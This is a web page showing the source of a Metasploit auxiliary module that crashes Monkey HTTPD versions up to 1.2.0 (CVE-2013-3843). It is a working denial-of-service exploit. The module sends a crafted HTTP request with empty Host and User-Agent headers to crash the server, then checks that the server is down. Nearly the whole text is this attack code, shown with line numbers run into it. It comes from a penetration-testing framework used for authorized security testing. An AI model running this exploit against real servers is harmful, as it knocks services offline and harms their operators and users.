Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/monkey_headers.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',12'Description' => %q{13This module causes improper header parsing that leads to a segmentation fault14due to a specially crafted HTTP request. Affects version <= 1.2.0.15},16'Author' =>17[18'Doug Prostko <dougtko[at]gmail.com>'19],20'License' => MSF_LICENSE,21'References' =>22[23['CVE', '2013-3843'],24['OSVDB', '93853'],25['BID', '60333']26],27'DisclosureDate' => '2013-05-30'))2829register_options(30[31Opt::RPORT(2001)32])33end3435def dos36req = "GET / HTTP/1.1\r\n"37req << "Host:\r\n\r\nlocalhost\r\n"38req << "User-Agent:\r\n\r\n"3940connect41sock.put(req)42disconnect43end4445def is_alive?46begin47connect48rescue Rex::ConnectionRefused49return false50ensure51disconnect52end5354true55end5657def run58print_status("#{rhost}:#{rport} - Sending DoS packet...")59dos6061print_status("#{rhost}:#{rport} - Checking server status...")62select(nil, nil, nil, 1)6364if is_alive?65print_error("#{rhost}:#{rport} - Server is still alive")66else67print_good("#{rhost}:#{rport} - Connection Refused: Success!")68end69end70end717273